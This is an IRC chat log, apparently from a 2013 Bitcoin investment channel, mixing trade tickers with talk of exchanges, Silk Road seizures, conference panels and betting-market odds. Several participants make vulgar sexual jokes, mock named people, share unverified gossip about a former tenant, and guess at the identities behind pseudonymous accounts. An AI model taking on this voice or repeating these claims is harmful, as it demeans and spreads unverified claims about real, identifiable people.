BITBOOK REPS, NO NOTHING RIGHT NOW. THE SITE JUST STRAIGHT UP DISAPPEARED. AND I WAS LITERALLY JUST WITHDRAWING THE BITCOINS INTO CASH. I HAVE LIKE $0 I NEEDED THAT MONEY SO BADLY YOU DON'T UNDERSTAND." Oct 07 23:24:05 > THAT'S LIKE SERIOUSLY MY LIFE SAVINGS Oct 07 23:24:13 i guess there IS a sr alternative now ? Oct 07 23:24:22 HELP I NEED MY COINS. BITBOOK HAS 15 OF MY COINS THAT'S LIKE SERIOUSLY MY LIFE SAVINGS I'M GOING TO FLIP MY SHIT. Oct 07 23:24:27 oh snap Oct 07 23:24:46 ha! you were last once dub boy! Oct 07 23:24:51 SHIT ABOUT TO BE FLIPPED YO Oct 07 23:25:05 [HAVELOCK] [AM1] 7 @ 1.2 = 8.4 BTC [-] {2} Oct 07 23:26:02 the bitstarsite used the picture from somewhere else http://www.democracychronicles.com/nj-politics-overwhelmed-by-role-of-money-in-elections/ Oct 07 23:26:06 [BTCTC] [LABCOIN] 29391 @ 0.00012161 = 3.5742 BTC [-] {5} Oct 07 23:26:11 anyway, here's a funny thing re locs that'll probably make anyone jealous. Oct 07 23:26:27 my bank here in romania is giving me free securitized BLO forms which I may use for any amt, even 50 bux, Oct 07 23:26:29 so that 'blog' is 100% referral begging posts Oct 07 23:26:37 and they DO include the extra call to release which is basically all a loc provides Oct 07 23:26:38 seems legit Oct 07 23:27:05 making romanian banking better than bitcoin, even. Oct 07 23:27:07 [BTCTC] [ASICMINER-PT] 7 @ 1.20628571 = 8.444 BTC [-] {4} Oct 07 23:29:09 [HAVELOCK] [CBTC] 5000 @ 0.00028843 = 1.4422 BTC [+] {2} Oct 07 23:35:48 http://www.youtube.com/embed/3C9Bng7NPPY Oct 07 23:35:51 someone should ipo this. Oct 07 23:36:51 the touch - YouTube Oct 07 23:43:31 i developed an algorithm to predict the next 12 difficulty increases last november, and it's been correct within 2% for the past five months Oct 07 23:44:30 I would be surprised if it worked for the following months Oct 07 23:45:10 nubbins`: i reused mining forecast spreadsheet and it was very accurate, too Oct 07 23:45:37 just assumed it will go up 30% every time and the time will shorten accordingly Oct 07 23:45:55 wiki doesnt have any info on joe scjhmoe Oct 07 23:46:03 ah, i used ODEs, complicated as fuck Oct 07 23:46:08 o i was scrolled up nevermind Oct 07 23:46:09 your method sounds easier ;p Oct 07 23:46:57 and how do you separate accuracy from coincidence? Oct 07 23:47:11 see, that's the thing, you can't Oct 07 23:48:18 yes i can't Oct 07 23:48:58 plus i'm totally making this all up Oct 07 23:49:03 so you need to weigh that as well Oct 07 23:49:24 add to it cases when next increase falls around idiffs expiration time Oct 07 23:49:28 [HAVELOCK] [AM100] 30 @ 0.01195825 = 0.3587 BTC [-] {6} Oct 07 23:49:33 which is about to happen on October 16th Oct 07 23:50:12 either 190m or 250m will be paid, no one knows how much Oct 07 23:50:20 fun :) Oct 07 23:52:22 short idiffs, ddos all the pools Oct 07 23:52:50 profit! Oct 07 23:53:01 you should ipo that Oct 07 23:53:11 In which a representative of SolarWindMiningCompany asked "dafuq is BingoBoingo" http://www.thedrinkingrecord.com/2013/10/07/re_dafuq_has_the_nerve/ A reply to an AMAZING COMPANY Oct 07 23:53:12 AMAZING COMPANY! Oct 07 23:54:20 https://www.cryptsy.com/ moar altcoinz, moar amazing Oct 07 23:54:21 AMAZING COMPANY! Oct 07 23:54:22 Cryptsy - Trade Home Oct 07 23:55:09 http://25.media.tumblr.com/3191541bb5c4862c10d9b705ad6b0bf7/tumblr_mqajegAvOJ1rypweio1_500.gif Oct 07 23:55:12 ^^^ ipo that Oct 07 23:55:23 amazing cat Oct 07 23:55:23 AMAZING COMPANY! Oct 07 23:55:31 jeez Oct 07 23:55:34 [BTCTC] [FN] [BTC-GROWTH] 4 @ 0.085495 = 0.342 BTC [+] {2} Oct 07 23:55:51 do not click if you have epilepsy Oct 07 23:56:20 too late Oct 07 23:56:57 do not have epilepsy Oct 07 23:58:33 i wonder would people buy green coffee beans with btc? Oct 07 23:58:47 i've got a bunch that i won't be roasting any time soon Oct 08 00:12:26 uh oh http://smidge.com/ Oct 08 00:13:01 What is smidge anyway? Oct 08 00:13:04 lol good one. Oct 08 00:13:08 LEL Oct 08 00:13:11 besides done and usagi Oct 08 00:13:33 wasn't smidge traded on havelock for like a day and a half or something? Oct 08 00:13:38 "I largely address the issue of who the fuck has the never for this " Oct 08 00:13:40 not bad Oct 08 00:13:43 jborkl: otc fund Oct 08 00:14:00 https://docs.google.com/spreadsheet/ccc?key=0AgLGW6ARhmFLdDVyLUFPYjBHX0FIWWxXTy1Bc09uaVE&usp=sharing Oct 08 00:14:01 Google Docs - Online documents, spreadsheets, presentations, surveys, file storage and more Oct 08 00:14:20 smidge is this irl accountant guy with a jet fighter pilot wife and two kids, who used to broker for mpex and do a bunch of other venture stuff Oct 08 00:14:28 but has been busy with fambly past year or so. Oct 08 00:14:39 isnt that smickles? Oct 08 00:14:45 his kids brokered for mpex? jesus Oct 08 00:14:51 x_X Oct 08 00:14:53 lol Oct 08 00:15:04 its smickles yea not smidge Oct 08 00:15:08 lmao Oct 08 00:15:08 o fuck me. Oct 08 00:15:12 lol Oct 08 00:15:18 smi* Oct 08 00:15:23 ok ok. smidge is this dangerously close to smickles named guy, who;'s kinda young, unwed, Oct 08 00:15:34 and been trying to do things of import on the forum with moderate success. Oct 08 00:15:39 smidge is also known as midge. Oct 08 00:15:41 does he at least have a girlfriend who is a boat captain or something? Oct 08 00:15:45 i suppose he's taken -pr ish advice and is nao lurking Oct 08 00:15:56 he also disappeared when we called him usagi Oct 08 00:16:04 and usagi disappeared too Oct 08 00:16:06 we are all usagi Oct 08 00:16:06 yup from this channel Oct 08 00:16:19 i don't think he's usagi because he made german-type slight style errors Oct 08 00:16:24 though smidge has a few social profiles which look legit Oct 08 00:16:28 whereas princess oliver is purely midwestern Oct 08 00:16:34 yeah, he pm'd me very angry that day Oct 08 00:16:39 lol rly? Oct 08 00:16:55 [BTCTC] [LABCOIN] 25113 @ 0.00012068 = 3.0306 BTC [-] {3} Oct 08 00:17:01 apparently being called usagi is a pretty damning insult Oct 08 00:17:08 well... Oct 08 00:17:21 usagi is the new judas Oct 08 00:17:32 i wonder if judas had tits Oct 08 00:17:38 calling someone Usagi is very insulting Oct 08 00:17:39 would she had still been the villain Oct 08 00:17:56 [BTCTC] [LABCOIN] 121603 @ 0.00011355 = 13.808 BTC [-] {20} Oct 08 00:18:02 mircea_popescu: well, look at jesus' wife Oct 08 00:18:03 I think that means dumbass in Japanese Oct 08 00:18:07 people called her a hooker! Oct 08 00:18:11 or maybe tranny Oct 08 00:18:28 jborkl i agree. imo the insult ladder goes like taaki > usagi > pietilla > wagner Oct 08 00:18:51 taaki has awesome hair :/ Oct 08 00:18:57 [HAVELOCK] [AM1] 1 @ 1.17 BTC [-] Oct 08 00:19:06 i never saw him naked. Oct 08 00:19:15 lol touche Oct 08 00:20:27 i liked pietilla before he went nuts Oct 08 00:20:45 btc = $ 300k ! Oct 08 00:20:52 i liked him after he went nuts past the point of common nuttery into pure trollage. Oct 08 00:21:42 "If you are a representative of Solar Wind Mining reading this, be aware that I’m not calling you a scam. I’m saying that you potentially legitimate venture doesn’t even look as good as some scams, and this situation was entirely preventable." Oct 08 00:21:44 ajhaha this is epic. Oct 08 00:22:05 "bitch, i'm not saying you're a whore, i'm saying you look worse than plenty of whores and this is all your doing." Oct 08 00:29:08 [HAVELOCK] [AM1] 10 @ 1.169 = 11.69 BTC [-] {2} Oct 08 00:29:28 https://bitcoinpresscenter.org/page/faq behold the experts Oct 08 00:29:29 FAQ | Bitcoin Press Center Oct 08 00:30:09 [HAVELOCK] [AM100] 414 @ 0.01159447 = 4.8001 BTC [-] {12} Oct 08 00:30:31 self-nominated of course Oct 08 00:30:38 Q: Do the moderators decide who is added or not? Oct 08 00:30:38 A: No, the moderators only check accuracy. They are neither qualified nor authorized to make press relations decisions Oct 08 00:30:40 who isn't? Oct 08 00:30:56 maybe mpoe-pr can register :D Oct 08 00:31:21 a+, would nominate Oct 08 00:31:42 they need some sorta badges too Oct 08 00:31:49 how can i add my klout score? Oct 08 00:32:00 :) Oct 08 00:32:19 lel Oct 08 00:32:26 https://bitcoinpresscenter.org/presscontact/ryan-dickherber Oct 08 00:32:26 Ryan Dickherber | Bitcoin Press Center Oct 08 00:32:34 that can;t be a name Oct 08 00:32:43 that's up there with Destiny Fardy-Butt Oct 08 00:32:46 does he harbor the dick ? Oct 08 00:33:13 i should make one and use trilema quotes for all my citations Oct 08 00:33:14 usagi chose 'smidge' because it was close to smickles and he had gone awol Oct 08 00:33:21 https://bitcoinpresscenter.org/presslist-filtered/spoken-slovak Oct 08 00:33:22 Bitcoin Press Center | A global media center for bitcoin Oct 08 00:33:25 standard operating proceedure Oct 08 00:33:36 he harbours that fucking stogie pretty well Oct 08 00:34:14 TuurDemeester < that was another name on the site Oct 08 00:34:18 https://bitcoinpresscenter.org/presscontact/mari-n-jan-u-ka Oct 08 00:34:20 turd dumpster Oct 08 00:34:25 https://bitcoinpresscenter.org/sites/default/files/me_big.jpg Oct 08 00:34:29 lelelel Oct 08 00:34:48 tuur is a pretty good dude Oct 08 00:34:51 i bet the WSJ is calling him right now Oct 08 00:34:57 btw and it came out exactly this dude is going to install bitcoin atm in bratislava Oct 08 00:35:14 [MPEX] [S.MPOE] 3698 @ 0.00084045 = 3.108 BTC [-] Oct 08 00:35:53 nice, do you know where exactly jurov ? Oct 08 00:36:02 was not said where yet Oct 08 00:36:14 I want some bitcoin ass to mouth Oct 08 00:36:16 JobTitle:CEO, IT Conslutant lmaoooooooo Oct 08 00:36:18 so i received a judgment in the mail today, regarding the claim we filed against our previous tenants Oct 08 00:36:27 they awarded us 100% of what we asked for! Oct 08 00:36:30 party time Oct 08 00:36:34 https://bitcoinpresscenter.org/presslist-filtered/spoken-korean Oct 08 00:36:34 Bitcoin Press Center | A global media center for bitcoin Oct 08 00:36:35 lolol Oct 08 00:36:46 so sexy! Oct 08 00:36:49 conslutant is a pretty much what consultants should actually call themselves Oct 08 00:37:04 heh Oct 08 00:37:35 nubbins`: spend it on psychotic hookers Oct 08 00:38:08 nubbins` get pankkake to tell you what the mystery drug is called Oct 08 00:38:08 after seeing Roger Ver in person I no longer think someone had a gun to his head in that Gox-is-fine video, he's just that uncomfortable acting all the time Oct 08 00:38:20 dub: i just press my ear to the wall if i want psychotic hookers Oct 08 00:38:35 nubbins` why not ask them over ? Oct 08 00:38:36 pankkake: what is the mystery drug called? (?) Oct 08 00:38:39 a fun moment was when Mike Hearn told the Mastercoin guy his project was shit Oct 08 00:38:42 I cannot tell Oct 08 00:38:44 mircea_popescu: she's a beast Oct 08 00:39:03 something like "i believe you are actually trying to do it, i just dont think you are capable" Oct 08 00:39:05 so bitcoin central sends me a mail to say I'm refused again, does not tell me why, and the website says everything is still under review Oct 08 00:39:07 currently she is screaming "GERRRAHHHHHHHHHHHH" to her empty apartment Oct 08 00:39:27 i think Hearn was my favorite guy Oct 08 00:39:39 he has that i'm so smart it hurts to be around you attitude Oct 08 00:39:40 interspersed with wails of despair and things being thrown at walls Oct 08 00:39:43 ThickAsThieves im curious what happens if hearn ever gets his shit together and shows up at some event of mine Oct 08 00:39:49 cause basically i hold the same opinion of him. Oct 08 00:40:37 he was even reasonable when i asked him if he felt this whole decntralization of everything trend was a worthy pursuit Oct 08 00:40:56 said it's not his pursuit, and that i was right to question it Oct 08 00:41:16 i'm going to start a forum called bitcoinchat.org Oct 08 00:41:18 i believe centralization is the natural evolution of most things Oct 08 00:41:21 well sure. ask him if he thinks it's ok to submit revisions to code he's never read. Oct 08 00:41:24 you have to pay to sign up Oct 08 00:41:26 oh Oct 08 00:41:26 that'll be a diff question. Oct 08 00:41:28 and you get dividends Oct 08 00:41:36 every time you post Oct 08 00:41:40 i also asked him about the "core devs" Oct 08 00:41:50 nubbins` something like that might actually work. a ponzi forum Oct 08 00:41:54 basically i expressed that this name alone worries me, Oct 08 00:41:56 not a ponzi Oct 08 00:42:04 you get divs! Oct 08 00:42:05 you pay X to join, you get a percentage of all subsequent joins equal to your "trust rating" Oct 08 00:42:09 as voted by other members. Oct 08 00:42:12 that accepting the devs as "core" is the most dangerous centralization in bitcoin Oct 08 00:42:16 on this he disagreed Oct 08 00:42:29 mircea_popescu: i just need to figure out how to structure the "house edge" Oct 08 00:42:31 he says Gavin knows what's best and he trusts him, basically Oct 08 00:42:46 i didnt press the issue, but i disagreee Oct 08 00:42:51 well i don't. Oct 08 00:42:58 used to , but after the retarded server shit... meh. Oct 08 00:43:35 i both appreciate that some party is making the effort, and worry that it's just one party Oct 08 00:44:03 what if Gavin is wrong one day? or makes a big mistake? Oct 08 00:44:06 etc Oct 08 00:44:10 or dies Oct 08 00:44:24 im hard pressed to appreciate the effort these days. Oct 08 00:44:43 i also brought up the Btc foundation Oct 08 00:44:59 he said there's no situation where gavin would just do what they vote for Oct 08 00:45:01 paid or not Oct 08 00:46:02 did i already tell you guys about the moment with the central banks being put on the spot? Oct 08 00:46:08 it was pretty awesome Oct 08 00:46:20 it was the Regulation panel Oct 08 00:46:30 i wonder if there's a vid Oct 08 00:46:49 do tell Oct 08 00:46:50 there is Oct 08 00:47:05 i'll find it Oct 08 00:47:05 what circlejerk have you been attending? Oct 08 00:47:11 Bitcoin Europe Oct 08 00:47:18 aka BTC-E Oct 08 00:47:47 who ate the biscuit? Oct 08 00:47:59 everybody Oct 08 00:50:34 the panel is Wieske Ebbe (Dutch Central Bank), Michael Maier (Fidor Bank), Niels Ploeger (Amsterdam Police), Joerg Platzer (Crypto Economics Consulting Group) & Casper Riekerk (Finnius Lawyers) Oct 08 00:50:44 finding place in video Oct 08 00:51:24 http://www.youtube.com/watch?v=GaW2iPSPEs0&feature=player_detailpage#t=2218 Oct 08 00:51:24 Regulation Of Bitcoin - The European Bitcoin Convention -- 2013 Amsterdam - YouTube Oct 08 00:51:29 there i think that's it Oct 08 00:51:30 interesting that non-hard-core-bitcoiners were there Oct 08 00:52:13 ;;tslb Oct 08 00:52:20 Time since last block: 48 minutes and 5 seconds Oct 08 00:52:45 the audience question basically boils down to "Who are the real criminals, and what are you doing to regulate yourselves" Oct 08 00:52:58 it's the only question no one on the panel attempted to answer Oct 08 00:53:15 at 22:18? Oct 08 00:53:23 haha, nice Oct 08 00:53:27 (your links does nt work) Oct 08 00:53:39 at 37:40ish Oct 08 00:53:57 37:10 is when it begins Oct 08 00:55:07 why does the mac have more than one apple logo? Oct 08 00:55:16 is this the special fanboy edition? Oct 08 00:55:33 lol Oct 08 00:55:56 http://imgur.com/u4Ba5k5 Oct 08 00:55:57 imgur: the simple image sharer Oct 08 00:56:04 that's one of the things the tenants left behind Oct 08 00:56:07 fucked up Oct 08 00:56:54 lolwut Oct 08 00:57:07 right? Oct 08 00:57:15 lol that is kinda strange Oct 08 00:57:15 the guy who drew that has a 9yo daughter Oct 08 00:57:26 and i found diapers in his room, too Oct 08 00:57:32 really really really strange stuff Oct 08 00:57:59 lol Oct 08 00:58:14 I like those guys, they make me think I have a normal sexuality Oct 08 00:58:23 heh Oct 08 00:58:26 he also had a photo album Oct 08 00:58:28 Oh, the Ryan Dickherber character got a mention here. At some point he contacted me in response to some local meetup I half assedly tried to organize. He seemed rather boring so I didn't bother. Pretty sure it is actually his name though. Oct 08 00:58:50 full of pictures of wizards, fantasy landscapes, and a small section of women's faces on the very last page, with cut-out photos of himself glued on top Oct 08 00:59:26 gonna link the vid of Hearn chewing up mastercoin Oct 08 00:59:52 http://www.youtube.com/watch?v=hwyZ7ZgCq_o&feature=player_detailpage#t=457 Oct 08 00:59:53 Decentralized Exchange Panel - The European Bitcoin Convention -- 2013 Amsterdam - YouTube Oct 08 01:00:00 mastercoin is a pretty good chuckle Oct 08 01:00:39 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 08 01:01:22 apparently no one filmed me asked the quantum mining guys who they thought they were fooling Oct 08 01:01:27 asking* Oct 08 01:02:04 alot of altcoin focus on that convetion? Oct 08 01:02:06 that sounds like another diaspora* in the making Oct 08 01:02:44 not much altcoin focus really Oct 08 01:02:52 charlie lee did appear twice Oct 08 01:03:00 but to discuss coinbase mostly Oct 08 01:03:24 i considered asking him when they would list ltc Oct 08 01:03:25 ah ok Oct 08 01:03:29 but i knew he wouldnt answer Oct 08 01:03:52 i think one of the other guys at coinbase said in a video that they wasnt going to Oct 08 01:04:02 after he said they hired lee Oct 08 01:05:44 [BTCTC] [FN] [DMS.SELLING] 48 @ 0.0041 = 0.1968 BTC [+] Oct 08 01:06:13 http://www.washingtonpost.com/blogs/the-switch/wp/2013/10/07/the-switchboard-the-fbi-has-only-seized-26000-of-the-600000-bitcoins-silk-road-raked-in/ Oct 08 01:06:14 The Switchboard: The FBI has only seized 26,000 of the 600,000 Bitcoins Silk Road raked in Oct 08 01:06:17 sigh Oct 08 01:06:30 so is btctc web gone? Oct 08 01:06:40 the FBI has seized some 26,000 Bitcoins, but they have "not been able to get to Ulbricht’s personal Bitcoin yet. 'That’s like another $80 million worth,' [and FBI spokesperson] said Oct 08 01:07:32 after reading that, i wondered if they even knew what addresses the funds are in Oct 08 01:07:36 or if they're just guessing Oct 08 01:08:44 i still think it's based on sales logs Oct 08 01:08:56 rather than actually knowing a wallet is out there Oct 08 01:10:51 well, that's silly Oct 08 01:12:22 mircea_popescu, still there? Oct 08 01:12:50 [MPEX] [S.MPOE] 2500 @ 0.00083744 = 2.0936 BTC [-] Oct 08 01:15:03 https://bitcointalk.org/index.php?topic=125629.msg3295891#msg3295891 LOL Oct 08 01:15:05 [BTC-TC] Virtual Community Exchange [WINDING DOWN] Oct 08 01:15:54 I wonder why people don't just setup auto renewal Oct 08 01:16:16 haha Oct 08 01:16:32 because they might really NEED that ten bucks, this time next year Oct 08 01:17:10 DEEEEERP Oct 08 01:17:38 I thought .co domains were free Oct 08 01:21:31 yes. Oct 08 01:22:53 ThickAsThieves strangely enough for a "dutch central bank" rep, nobody heard of this ebe fellow. Oct 08 01:24:01 ;;google site:dnb.nl ebbe Oct 08 01:24:02 No matches found. Oct 08 01:24:34 http://trilema.com/2013/least-likely-to-succeed-character-the-upseller/ although I read the article I couldn't find a reason way back and lay betting with btc is problematic Oct 08 01:24:35 Least likely to succeed character : The upseller pe Trilema - Un blog de Mircea Popescu. Oct 08 01:25:02 BingoBoingo glwt. Oct 08 01:26:34 Thanks mircea_popescu they seem like they can't even throw a proper labcoin style AMAZINGCOMPANY shitstorm. This might be more boring than I anticipated. Oct 08 01:26:46 b0n1 well, ok. let's see here Oct 08 01:27:35 do you grok the part of how back/lay is a subset of mutual betting ? Oct 08 01:28:05 [MPEX] [S.MPOE] 2443 @ 0.00083772 = 2.0465 BTC [+] Oct 08 01:28:16 no Oct 08 01:28:49 mkay. this is a problem of maffs. let's try something else : Oct 08 01:29:10 do you see how the back/lay system distributes liquidity arbitrarily ? Oct 08 01:31:37 yes Oct 08 01:32:25 okay. do you see how that can be used to shave a significant edge off the naive players ? Oct 08 01:32:54 no Oct 08 01:33:32 "The last time I had seen grown humans throw up like stressed out cats we were in a ditch and being fired upon." Oct 08 01:33:38 do elaborate Oct 08 01:33:53 paintball Oct 08 01:34:35 b0n1 ok, simpler case of that : mutual betting is lay/back with no spread. if you can lay for 45 cents then you can back for 55, precisely. Oct 08 01:34:49 nubbins` nah ty. Oct 08 01:35:10 tease Oct 08 01:35:24 tat, lel Oct 08 01:36:14 yeah, i see that point Oct 08 01:37:32 now consider the cancellation problem. Oct 08 01:37:42 a mutual bet you can always cancel by making an appropiate bet on the other side. Oct 08 01:37:54 a back/lay bet you can only cancel if someone is willing to unwind you. Oct 08 01:38:02 in low liquidity this becomes pretty huge. Oct 08 01:38:19 http://www.phrases.org.uk/meanings/scot%20free.html not sure how I stumbled on this but the pic of Dred Scott alone is worth the share Oct 08 01:38:20 Scot free Oct 08 01:39:05 yes mircea_popescu Oct 08 01:39:10 i thought it was about scottish people Oct 08 01:39:50 b0n1 so basically, mutual betting is better for the bettor. line betting is great for the bookie. lay/back is great for the site/liquidity provider Oct 08 01:39:57 which is i guess another way of saying bookie. Oct 08 01:40:30 yes but additionally lay/back is also good for arbing Oct 08 01:40:42 give an example Oct 08 01:41:19 [MPEX] [S.MPOE] 7805 @ 0.00083743 = 6.5361 BTC [-] {2} Oct 08 01:41:41 for example in a football game when you can bet on team A or team B or draw and also lay every bet, too Oct 08 01:42:00 there can be many scenarios where there are arbitrage opportunities Oct 08 01:42:47 sure, the event can be repackaged every which way, but fundamentally it's either a or b. Oct 08 01:43:20 [MPEX] [S.MPOE] 309 @ 0.00083772 = 0.2589 BTC [+] Oct 08 01:43:27 yes, but you can for example lay b and bet a and can do arbitrage with that Oct 08 01:43:33 i don't see we have such a shortage of events that we need to make them last by creating dozens of bets out of the same one thing Oct 08 01:44:07 because prices are set by supply and demand from the users, at least thats how it works on betfair Oct 08 01:44:26 you can do the same exact thing on mutual betting, except paying less vig. Oct 08 01:44:48 take the most recent cointerra thing : Oct 08 01:44:49 http://bitbet.us/bet/550/cointerra-will-deliver-in-2013/ Oct 08 01:44:51 BitBet - Cointerra will deliver in 2013 Oct 08 01:44:57 ;;calc 5.16 / 0.08 Oct 08 01:44:57 64.5 Oct 08 01:45:13 unless you think it's 64.5 to 1 they actually deliver, there's some arbitrage there. Oct 08 01:45:44 yeah.. my issue is that it feels like unless you get in early there is no way to bet. Oct 08 01:45:49 i.e. http://bitbet.us/bet/119/the-spot-gold-price-will-trade-above-2000-oz/ Oct 08 01:45:55 the odds on both sides suck. Oct 08 01:46:04 how can the odds on both sides suck ? Oct 08 01:46:09 unless i misunderstand something.. Oct 08 01:46:24 mircea_popescu, i am not sure whether that is of the same nature as the point i want to mention here Oct 08 01:46:33 okay, i'm going to step outside for a few moments Oct 08 01:46:35 in the meantime Oct 08 01:46:36 http://imgur.com/a/9EqWU Oct 08 01:46:37 This is why damage deposits exist. - Imgur Oct 08 01:47:01 mike_c well, it's an 8 month old bet. it's almost dead. you still get 1.1 / 1.7 for 2 months out. Oct 08 01:48:01 yeah. just seems like the weight drops off so quickly that its tough to get in. The weighting system seems to go against your philosophy of monitoring the bet and pushing the other side if you think the bet has moved the wrong way. Oct 08 01:48:02 seeing how it's 1.3k atm... seems about right to me. you get better odds on that somewhere ? Oct 08 01:48:26 i dunno that it does that honestly. Oct 08 01:49:11 seems to me it's actually pricing the thing pretty darned accurately. if you look at options they're a worse deal. Oct 08 01:49:23 lemme check Oct 08 01:49:59 i dunno that you can derive 10% gains over ghold staying under 2k an ounce for the rest of the year Oct 08 01:50:45 b0n1 what'd be the difference you'd say? Oct 08 01:51:11 nasdaq.com is slow as shit. Oct 08 01:52:59 ok. i agree with you (and therefore will place a bet). let me find a better example or understand that I was wrong. Oct 08 01:53:34 in general it's a daunting proposition, because it's so unstructured. Oct 08 01:53:46 people are used to the very cloistered situation traditional betting venues offer. Oct 08 01:54:00 the only problem is, traditional betting venues work much like the casino, to skim as much as possible. Oct 08 01:56:25 [MPEX] [S.MPOE] 7550 @ 0.00083797 = 6.3267 BTC [+] {2} Oct 08 01:56:35 mircea_popescu, what i mean with arbing is for example in a binary bet where you can bet on event A or B you could lay both and make profit ( arbitrage opportunity) Oct 08 01:58:01 the quotes for bet/lay of an event A are not "entangled" with bet/lay of an event B so to say Oct 08 01:58:27 so then if the events are unrelated then this is simply atiomic betting. you can bet no on all the various miner deliveries on bitbet and win with all Oct 08 01:58:29 heck, people have. Oct 08 02:00:33 don't see the point here Oct 08 02:01:18 well me either. Oct 08 02:01:30 so you can lay two unrelated bets. if they're unrelated that;'s not arbitrage. Oct 08 02:01:51 they are of course related, but theprices are not directly related Oct 08 02:01:58 >< Oct 08 02:02:05 so basically you'd like to bet with stupid people ? Oct 08 02:02:29 well mircea_popescu a lot of money make a living with that all day on betfair ... Oct 08 02:02:37 a lot of people Oct 08 02:03:07 i don't think a discussion of the cluelessness of the population can in principle be made into a comparison of betting systems. Oct 08 02:03:24 it;s like saying that car x is a better car than car y because you've seen more big busted blondes in car x. Oct 08 02:03:39 while this may be true, either in your own case or even generally, it still has northing to do with the car. Oct 08 02:06:02 mircea_popescu: apparently I'm a sock for your PR now, or she's a sock for me? I'm wondering if this SolarWind thing has scammed before https://bitcointalk.org/index.php?topic=297334.msg3296064#msg3296064 Oct 08 02:06:10 well... initially I was wondering why there is no back/lay betting system for btc so far. You told me then that there are difficulties and I was curious about them, but still dont get it I am afraid Oct 08 02:06:40 i told you a number of people tried, and it never caught, presumably because there's better alternatives available. Oct 08 02:07:07 mircea_popescu, what alternatives? Oct 08 02:07:36 i think i'll have to drop this now. Oct 08 02:08:46 BingoBoingo better learn to walk in heels. Oct 08 02:09:28 I think its an idea worth thinking about since back/lay betting systems are much more attractive for intelligent punters who don't want to get robbed by line bettings Oct 08 02:10:46 until they put the afternoon required into figuring it out and move on to mutual. Oct 08 02:12:26 mircea_popescu: Sounds like a dicey proposition. Like b0n1's idea that back/lay bettors are any less robbed than line bettors Oct 08 02:13:08 BTCT will be open for trading for one more day due to the domain registration lasping today https://bitcointalk.org/index.php?topic=125629.msg3296116#msg3296116 Oct 08 02:14:05 http://bitbet.us/bet/550/cointerra-will-deliver-in-2013/ why is nobody betting a yes here? Chances are much higher for yes atm than for no Oct 08 02:14:06 BitBet - Cointerra will deliver in 2013 Oct 08 02:14:39 what's a cointerra? Oct 08 02:14:43 i mean a reasonable big amount on yes Oct 08 02:14:55 b0n1 well it's new, prolly nobody with a balance saw it yet. Oct 08 02:15:04 or who knows, maybe there's no confidence in delivery. Oct 08 02:16:21 After the Picostocks news I'm leaning towards no chance CoinTerra delivers, if they deliver at all I imagine it would be BFL style... Oct 08 02:17:17 but someone here confirmed some hours ago visiting cointerra that they would deliver Oct 08 02:17:24 it's a great thing all these "companies" don't actually have professional cfos involved so nobody realises just how much damage a faux pas of the sort does to their prospects Oct 08 02:18:10 also there is high evidence since they already sold the december batch Oct 08 02:18:12 b0n1 twas jborkl, and he said that's what they said not what they'll do necessarily. Oct 08 02:18:32 lol by this criteria bfl delivered in 2012. Oct 08 02:18:42 :) Oct 08 02:19:47 !bash 2 Oct 08 02:19:48 Last 2 lines bashed and pending review. (http://dpaste.com/1409055/plain/) Oct 08 02:19:56 the only reasonable amount in there so far is a 5 btc on no and even the owner of this bet believes it is a yes since it was a hedge Oct 08 02:20:01 well thats a fail Oct 08 02:22:12 b0n1 mike_c was discussing a 50+ btc bet earlier. what's your definition of reasonable ? Oct 08 02:22:13 !b 5 Oct 08 02:22:14 Last 5 lines bashed and pending review. (http://dpaste.com/1409061/plain/) Oct 08 02:22:26 ThickAsThieves nobody caught you grilling the quantum guys? Oct 08 02:22:26 on no? Oct 08 02:22:34 yay Oct 08 02:22:40 b0n1: That 5 BTC no bet, probably wasn't a hedge. Sometimes a BitBet bet is just a bet and not a fancy hedge. Oct 08 02:23:41 http://bitbet.us/bet/119/the-spot-gold-price-will-trade-above-2000-oz/ Oct 08 02:23:45 43 no 11 yes or w/e Oct 08 02:23:45 BitBet - The spot gold price will trade above $2000/oz in 2013 Oct 08 02:23:59 http://bitbet.us/bet/147/mtgox-out-of-business-by-end-of-year/ Oct 08 02:23:59 Neo & Bee presentation at The Bitcoin Europe Conference https://www.youtube.com/watch?v=SFmiDBLQA1o Oct 08 02:24:00 BitBet - MtGox out of business by end of year Oct 08 02:24:00 22 : 6 Oct 08 02:24:19 http://bitbet.us/bet/518/btc-network-diff-to-top-210m-before-november/ Oct 08 02:24:20 BitBet - BTC network diff to top 210M before November Oct 08 02:24:21 whoa nelly. Oct 08 02:24:26 diff bets are such crazytalk. Oct 08 02:26:47 ThickAsThieves this video is really bad quality. Couldn't you at least get a tripod? Oct 08 02:27:33 anyone else notice Mr. S endorsing ESP? https://twitter.com/EJosephSnowden/status/384018062237659136 Oct 08 02:28:25 why are diff bets crazytalk? Oct 08 02:29:11 well for instance that one looked like it'll go the other way at outset. Oct 08 02:29:38 peterl, the video was never planned to be made Oct 08 02:29:45 it's just me holding a tablet Oct 08 02:30:13 there was an official videographer there Oct 08 02:30:13 oh, that explains it. I guess that is decent quality for a tablet video Oct 08 02:30:14 asciilifeform huh ?! Oct 08 02:30:22 but no sign of the video from this session Oct 08 02:30:52 mircea_popescu: that was certainly my impression from the link. Oct 08 02:31:15 what's esp for one ? Oct 08 02:31:27 as in telekinesis, etc Oct 08 02:32:20 uh Oct 08 02:32:20 he linked to some joker charging $$$$ for seminars in soothsaying, who makes clients sign NDA; S comments that 'they got to him, made him do it.' Oct 08 02:32:23 the uh, cypress sec, um.. we are posing to um them a *shrug* guildline, to ... bitcoin... Oct 08 02:32:40 mayhap the scrutiny is too close. Oct 08 02:34:10 [BTCTC] [DMS.MINING] 775 @ 0.00122 = 0.9455 BTC [-] {2} Oct 08 02:34:42 I'll laugh my arse off if it comes out that signals intel is being 'laundered' via... government soothsayers. Oct 08 02:34:58 Vexual, he was first presenter and a bit nervous maybe Oct 08 02:35:12 i dont think he's ever done this before Oct 08 02:35:30 yes Oct 08 02:35:46 i gave him some pointers after Oct 08 02:35:47 wouldn't be the first time Oct 08 02:35:51 but yknow Oct 08 02:35:55 but still. random shit ppkl say. Oct 08 02:36:02 reading between the line I am concerned about the lawyers saying that the regulators will be welcoming of their submissions Oct 08 02:36:23 everyone knows everyone in Cyprus Oct 08 02:36:39 it's very much a who-you-know kinda place Oct 08 02:36:40 Vexual always a good idea to keep in mind that people talking binds nobody. including the people themselves most of the time. Oct 08 02:36:44 yes, any theyve said the lawyers are tight with the regulators Oct 08 02:37:27 this sentiment was repeated by other lawyers i spoke with in other countries, Oct 08 02:37:45 